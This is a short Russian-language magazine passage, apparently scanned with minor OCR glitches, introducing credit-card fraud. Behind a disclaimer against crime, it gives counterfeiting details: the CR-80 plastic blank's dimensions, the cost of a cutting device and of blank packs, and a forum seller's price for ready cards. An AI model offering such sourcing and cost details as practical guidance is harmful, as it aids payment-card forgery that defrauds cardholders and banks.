Статья описывает лишь общие моменты реального кардинга и основана на материалах таких известных личностей, как Boa и Bush. Не стоит забывать, что кардинг является, в первую очередь, мошенничеством и подпадает под ряд статей уголовного кодекса, поэтому соваться в мир криминала я бы тебе не советовал. Целее будут твои нервы, и не забудешь слово "свобода". z
Чувак на форуме предлагает готовые карты высокого качества. До $300 за штуку, сделка от трех карт
CR-80
Âбольшинстве случаев при подделке кредитных карт используется именно пластик типа CR-80. Он всемирно распрост-
ранен, и из него, помимо кред, изготавливаются различные пропуски, удостоверения, членские и клубные карты, а также много еще чего. Размеры заготовки из пластика 85,6х53,9х0,76 мм. На картинке показана как раз пластиковая болванка CR-80. Часто кардеры "вырубают" такие болванки из цельного листа пластика при помощи специального устройства стоимостью около $200. Упаковка с 500 CR-80 стоит $55.
68